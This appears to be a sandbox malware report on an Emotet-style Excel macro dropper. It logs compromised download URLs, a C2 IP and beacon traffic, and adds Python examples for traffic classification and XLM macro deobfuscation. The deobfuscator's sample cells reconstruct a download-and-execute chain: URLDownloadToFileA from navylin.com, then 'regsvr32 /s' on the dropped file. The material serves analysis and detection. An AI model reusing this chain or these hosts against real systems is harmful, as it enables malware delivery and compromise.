                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Nov 2022 11:43:49 GMT | Server: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsd | Strict-Transport-Security: max-age=63072000; includeSubDomains | X-Frame-Options: SAMEORIGIN | X-UA-Compatible: IE=edge,chrome=1 | P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" | Powered-By: PrestaShop | Status: 404 Not Found | Set-Cookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERig61Z7mzgI5cdqQk7Ts1Z5oXp%2FAqcUL0r5BFPvLtErAilMIA%2BG6u6fOffdeloSSLftgvfHedjHZsx%2FnHB3u6bs5u%2F94PwbzL8h8iuQj5fU6ouxPvjTOMmxa%2BzRYyONLyaAb0hg9MOCCN3g2h1jkAF3E%3D000114; expires=Mon, 05-Dec-2022 11:43:49 GMT; Max-Age=1727999; path=/; domain=www.spinbalence.com; secure; httponly;HttpOnly;Secure | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html; charset=utf-8
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Nov 2022 11:43:51 GMT | Server: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsd | Strict-Transport-Security: max-age=63072000; includeSubDomains | X-Frame-Options: SAMEORIGIN | X-UA-Compatible: IE=edge,chrome=1 | P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" | Status: 404 Not Found | Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNolWp%2F7SQd8f90S8O%2FCwGo94XM8kzh2wgRtGRJ9nsrSdLdi59jw6GotzqA%2F%2BTveez7WUZj7S8ZwYcZXe6FVfsrOzQXtIeedQAsmUAviISLMDAANABHdlwwYRACr4DLkzU%3D000115; expires=Mon, 05-Dec-2022 11:43:51 GMT; Max-Age=1728000; path=/; domain=www.3d-stickers.com; httponly;HttpOnly;Secure | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html; charset=utf-8
                      Source: unknown | TCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1212625245.0000000003710000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 00000009.00000003.1155166331.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211753241.0000000000268000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://218.38.121.17/
                      Source: regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.coh
                      Source: regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll
                      Source: unknown; DNS traffic detected: queries for: sat7ate.com
                      Source: global traffic; HTTP traffic detected:
                          GET /Adapter/moycMR/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: www.spinbalence.com
                          Connection: Keep-Alive
                      Source: global traffic; HTTP traffic detected:
                          GET /index.php?controller=404 HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: www.spinbalence.com
                          Connection: Keep-Alive
                          Cookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERig61Z7mzgI5cdqQk7Ts1Z5oXp%2FAqcUL0r5BFPvLtErAiRnV0TG5b0npswANceXA1cwrQZJXojk9hvRnyRY37Ivk%3D000075
                      Source: global traffic; HTTP traffic detected:
                          GET /Content/Afa1PcRuxh/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: www.3d-stickers.com
                          Connection: Keep-Alive
                          Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtmJfdpSnAaKPknzS3gL2v8c%3D000079
                      Source: global traffic; HTTP traffic detected:
                          GET /page-non-trouvee HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: www.3d-stickers.com
                          Connection: Keep-Alive
                          Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hqQ6wpX78PX55d2aotWs5IA%3D000075
                      Source: global traffic; HTTP traffic detected:
                          GET / HTTP/1.1
                          Connection: Keep-Alive
                          Cookie: YYbWjqBjoLrCcX=SBgr/e6aC1IUNvJELTGXliW8JuD542AergoyMYXNvjxNLDRTdQNm8AuaxOmABbvgfv+8UtrcYH0nm8JVpNZn+3TWEfhRm/dUCR1CZolc/XwWvPSYMtjPL0bLJaxTy+IA9NnB1Bf21+p/nLECZUQKbQ3KotZmlTPMe1nDx9AvFrGbWdBwLhSH+OSwBm0uKoYGqTZIZ3usbgBMW4QV4nRpmrxN3K2+2Yb5BRhEeUfSv5e+Y0wUi7HP20VKUTWvvTmy+2YpSlrLS8NjnvoUHc/35DqIYRXDWKWVd2LKfBks9VLO8aBSd9lbpYy/Ixl+Ba5lMMnTILw8p+KXMtCwpS9W
                          Host: 218.38.121.17
                      Source: global traffic; HTTP traffic detected:
                          GET / HTTP/1.1
                          Connection: Keep-Alive
                          Cookie: BepnebNbbnhLwN=d2b7sFWgS9DsqV+ktIDEPfDYK+u4VvGDu6RH8sqyC93zoy+j0gBi669p4anprtQEM0FTQaa5CcQDsE2n3Jik1MwelLYMW0cB2ckzSva1GTO9Ozuc6BuVVWHKD0CdjeEPdE+oGqdZWNtAUHV9t6hIutCFWcQnGko8pFlEzh+24tzbK7usfHuWSo1g9glenYgi3haMAIuRx4H0rCms/1aWJHObgPJCMzJMZePW+6QsU2qZksYBpCGLUBB4No5nO9JG4fI9x4h7VheOpHD72h9Li3R3N4z9E+yOI9ADuJ2vMtr3yhVw
                          Host: 218.38.121.17
                      Source: global traffic; HTTP traffic detected:
                          GET /Adapter/moycMR/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: www.spinbalence.com
                          Connection: Keep-Alive
                      Source: global traffic; HTTP traffic detected:
                          GET /Content/Afa1PcRuxh/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: www.3d-stickers.com
                          Connection: Keep-Alive
                      Source: global traffic; HTTP traffic detected:
                          GET /bsavxiv/axHQYKl/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: navylin.com
                          Connection: Keep-Alive
                      Source: unknown; HTTPS traffic detected: 163.172.115.127:443 -> 192.168.2.22:49174 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 163.172.108.69:443 -> 192.168.2.22:49177 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exe; Code function: 8_2_10025238 GetParent,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,
                      Source: C:\Windows\System32\regsvr32.exe; Code function: 8_2_10014B20 GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                      Source: C:\Windows\System32\regsvr32.exe; Code function: 8_2_10025C50 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,
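The HTTP traffic listed in this section has two distinct shapes: the first-stage fetches made from the Office process (IE7-style User-Agent plus a UA-CPU header, two-segment directory URL, no Referer) and the later GET / beacons to 218.38.121.17 that carry nothing but a Connection header and a single long base64 cookie under a random name. The Python below is an added example for telling them apart, not code from the Joe Sandbox report or its analysis engine. The sample requests are reconstructed from the request lines above with CRLF framing restored and the PrestaShop cookie shortened (constructed input); the thresholds and path pattern are the author's assumptions fitted to this traffic, not an Emotet protocol specification. The PrestaShop 404 requests from the compromised hosts share the same User-Agent; the path check is what keeps them out of the stage-download class.

```python
import re
from dataclasses import dataclass

# Header values copied from the request lines in this report; CRLF framing is
# reconstructed and the PrestaShop cookie is shortened (constructed sample input).
URLMON_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
             ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             "Media Center PC 6.0; .NET4.0C; .NET4.0E)")


def _raw(request_line, *headers):
    return "\r\n".join((request_line,) + headers) + "\r\n\r\n"


SAMPLES = {
    "stage_download": _raw("GET /Adapter/moycMR/ HTTP/1.1", "Accept: */*", "UA-CPU: AMD64",
                           "Accept-Encoding: gzip, deflate", "User-Agent: " + URLMON_UA,
                           "Host: www.spinbalence.com", "Connection: Keep-Alive"),
    "site_404": _raw("GET /index.php?controller=404 HTTP/1.1", "Accept: */*", "UA-CPU: AMD64",
                     "Accept-Encoding: gzip, deflate", "User-Agent: " + URLMON_UA,
                     "Host: www.spinbalence.com", "Connection: Keep-Alive",
                     "Cookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERig61Z7mz"),
    "c2_beacon": _raw("GET / HTTP/1.1", "Connection: Keep-Alive",
                      "Cookie: YYbWjqBjoLrCcX=SBgr/e6aC1IUNvJELTGXliW8JuD542AergoyMYXNvjxNLDRTdQNm8A"
                      "uaxOmABbvgfv+8UtrcYH0nm8JVpNZn+3TWEfhRm/dUCR1CZolc/XwWvPSYMtjPL0bLJaxTy+IA9N",
                      "Host: 218.38.121.17"),
}


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict   # lower-cased header name -> value


def parse_request(raw):
    """Parse the request line and headers of one raw HTTP/1.1 request."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


# Patterns and thresholds are assumptions chosen to fit the traffic in this report.
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
COOKIE_NAME = re.compile(r"^[A-Za-z]{6,24}$")
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
STAGE_PATH = re.compile(r"^/[A-Za-z0-9_-]+/[A-Za-z0-9]+/$")
URLMON_UA_PREFIX = "Mozilla/4.0 (compatible; MSIE 7.0;"


def is_emotet_c2_beacon(req):
    """GET / to a bare IP, no User-Agent or Accept, one random-named cookie holding a base64 blob."""
    if req.method != "GET" or req.path != "/":
        return False
    if not IPV4_HOST.match(req.headers.get("host", "")):
        return False
    if "user-agent" in req.headers or "accept" in req.headers:
        return False
    cookies = [c.strip() for c in req.headers.get("cookie", "").split(";") if c.strip()]
    if len(cookies) != 1:
        return False
    name, sep, value = cookies[0].partition("=")
    return (bool(sep) and bool(COOKIE_NAME.match(name))
            and len(value) >= 64 and bool(B64_VALUE.match(value)))


def is_office_stage_download(req):
    """urlmon-style client (IE7 UA plus UA-CPU) fetching a two-segment directory URL with no Referer."""
    ua = req.headers.get("user-agent", "")
    return (req.method == "GET" and ua.startswith(URLMON_UA_PREFIX)
            and "ua-cpu" in req.headers and "referer" not in req.headers
            and bool(STAGE_PATH.match(req.path)))


def classify_request(raw):
    req = parse_request(raw)
    if is_emotet_c2_beacon(req):
        return "emotet-c2-beacon"
    if is_office_stage_download(req):
        return "office-urlmon-stage-download"
    return "unclassified"


if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:16} -> {classify_request(raw)}")
```

Run on a proxy or Zeek http.log export, the beacon rule is the higher-confidence one: a bare-IP Host with no User-Agent and a single opaque cookie has almost no legitimate producers, whereas the urlmon User-Agent is shared by every URLDownloadToFile caller on the host, so that rule should be joined with the parent process (EXCEL.EXE) before it is treated as an alert.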

                      E-Banking Fraud

                      Source: Yara match; File source: 0000000A.00000002.1211606431.000000000017A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.1211620382.000000000021A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 10.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 10.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000009.00000002.1211814809.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000002.1213054445.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.942096747.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.943086830.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.1212856230.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000002.1211836015.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: 4470_02112022.xls; Macro extractor: Sheet: Sheet6 contains: URLDownloadToFileA
                      Source: 4470_02112022.xls; Macro extractor: Sheet: Sheet6 contains: URLDownloadToFileA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\oxnv4.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll
                      Source: 4470_02112022.xls; Initial sample: EXEC
                      Source: 4470_02112022.xls; Initial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exe; File created: C:\Windows\system32\XXKTOC\
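The macro-extractor lines above report only the API name (URLDownloadToFileA) and the EXEC primitive in Sheet6; the URL and command line are assembled at run time from cell fragments and CHAR() codes, which is why a plain string search over the workbook does not recover them. The Python below is an added example, not code from the report or from Joe Sandbox: a small evaluator for that subset of Excel 4.0 (XLM) formula syntax that resolves "&" concatenation, CHAR() and A1-style cell references, records every other function call instead of executing it, and reports the download URL, destination path and EXEC command line it finds. The cell contents are constructed for illustration: the URL and destination reuse navylin.com/bsavxiv/axHQYKl/ and C:\Users\user\oxnv4.ooccxx from this report, while the "regsvr32 /s" command line is an assumption (the report shows regsvr32.exe processes but not their arguments). Cell values in a real workbook would be read with a tool such as oletools' olevba, which is not used here so the example runs offline.

```python
import re

# Token grammar for the subset of XLM formula syntax handled here:
# string literals, integers, function calls, A1-style cell references, "&" and ",".
_TOKEN = re.compile(
    r'\s*(?:(?P<str>"(?:[^"]|"")*")|(?P<num>\d+)|(?P<func>[A-Za-z_.]+)\('
    r'|(?P<cell>[A-Z]{1,3}\d+)|(?P<op>[&,)]))'
)


def tokenize(src):
    """Split a formula body (leading '=' already removed) into (kind, text) tokens."""
    src, pos, toks = src.strip(), 0, []
    while pos < len(src):
        m = _TOKEN.match(src, pos)
        if not m:
            raise ValueError("cannot tokenize: %r" % src[pos:])
        toks.append((m.lastgroup, m.group(m.lastgroup)))
        pos = m.end()
    return toks


class _Parser:
    """Recursive descent: expr := term ('&' term)*; term := str | num | cell | func(args)."""

    def __init__(self, toks, sheet):
        self.toks, self.i, self.sheet = toks, 0, sheet

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def take(self):
        tok = self.peek()
        self.i += 1
        return tok

    def expr(self):
        val = self.term()
        while self.peek() == ("op", "&"):
            self.take()
            val += self.term()
        return val

    def term(self):
        kind, text = self.take()
        if kind == "str":
            return text[1:-1].replace('""', '"')      # XLM doubles quotes inside strings
        if kind == "num":
            return text
        if kind == "cell":
            return self.sheet.value(text)
        if kind == "func":
            args = []
            if self.peek() != ("op", ")"):
                args.append(self.expr())
                while self.peek() == ("op", ","):
                    self.take()
                    args.append(self.expr())
            if self.take() != ("op", ")"):
                raise ValueError("missing ')' in call to %s" % text)
            return self.sheet.call(text, args)
        raise ValueError("unexpected token %r" % (text,))


class XlmSheet:
    """Evaluates cells lazily; CHAR() is emulated, every other call is recorded, not run."""

    def __init__(self, cells):
        self.cells, self.calls, self._cache = cells, [], {}

    def value(self, ref):
        if ref not in self._cache:
            raw = self.cells.get(ref, "")
            self._cache[ref] = (_Parser(tokenize(raw[1:]), self).expr()
                                if raw.startswith("=") else raw)
        return self._cache[ref]

    def call(self, name, args):
        name = name.upper()
        if name == "CHAR":
            return chr(int(args[0]))
        self.calls.append((name, args))
        return ""


def triage(cells):
    """Evaluate every cell; report CALL(...URLDownloadToFileA...) downloads and EXEC command lines."""
    sheet = XlmSheet(cells)
    for ref in cells:
        sheet.value(ref)
    findings = []
    for name, args in sheet.calls:
        if name == "CALL" and len(args) >= 6 and args[1].lower() == "urldownloadtofilea":
            findings.append({"kind": "download", "url": args[4], "path": args[5]})
        elif name == "EXEC" and args:
            findings.append({"kind": "exec", "command": args[0]})
    return findings


# Constructed cells (not the sample's real sheet): URL split across CHAR() codes and
# fragments; URL and destination taken from this report, the regsvr32 command assumed.
CELLS = {
    "A1": '=CHAR(104)&CHAR(116)&CHAR(116)&CHAR(112)&"://"',
    "A2": '="navylin.com"&"/bsavxiv/"&"axHQYKl/"',
    "A3": '="C:\\Users\\user\\oxnv4.ooccxx"',
    "A4": '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,A1&A2,A3,0,0)',
    "A5": '=EXEC("regsvr32 /s "&A3)',
}

if __name__ == "__main__":
    for finding in triage(CELLS):
        print(finding)
```

Because nothing but CHAR() is emulated, the evaluator cannot be steered into running anything; the trade-off is that formulas using other string functions (MID, FORMULA, REGISTER) come back partially resolved and are listed as recorded calls for manual review.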
